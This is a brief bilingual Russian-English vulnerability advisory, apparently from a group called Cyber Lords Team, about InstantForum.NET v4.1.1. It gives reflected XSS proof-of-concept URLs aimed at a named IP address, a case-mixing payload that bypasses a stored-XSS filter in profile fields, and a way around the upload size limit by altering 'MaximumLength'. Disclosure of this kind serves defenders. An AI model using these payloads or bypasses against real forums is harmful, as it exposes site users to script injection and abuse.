Advisory: InstantForum.NET v4.1.1
Home Page: http://instantasp.co.uk/
Уязвимость/Vulnerability:
Межсайтовый скриптинг/Cross Site Scripting
Уязвимый скрипт/Vulnerable script: Logon.aspx, Search1-2-1.aspx,
InsertAttachments.aspx
http://83.138.140.178/eCitizen_InstantForum411/Logon.aspx?SessionID=enzzuy30eeuijq45itfom1qu"><script>alert()</script><"
http://83.138.140.178/eCitizen_InstantForum411/Search1-2-1.aspx?SessionID=enzzuy30eeuijq45itfom1qu&SortBy=1"><script>alert()</script><"&SortOrder=1
http://83.138.140.178/eCitizen_InstantForum411/Search1-2-1.aspx?SessionID=enzzuy30eeuijq45itfom1qu&SortBy=1&SortOrder=1"><script>alert()</script><"
Межсайтовый скриптинг при отправке сообщения, в полях личной
информации(Interests, Biography, Signature).
Изменив регистр символов, возможно обойти фильтрацию.
Пример:
<IMG SRC=JaVaScRiPt:alert('XSS')>
Уязвимость/Vulnerability:
Обход ограничений на размер загружаемого файла.
Достаточно изменить число передаваемое параметру "MaximumLength".
Cyber Lords Team
www.cyberlords.net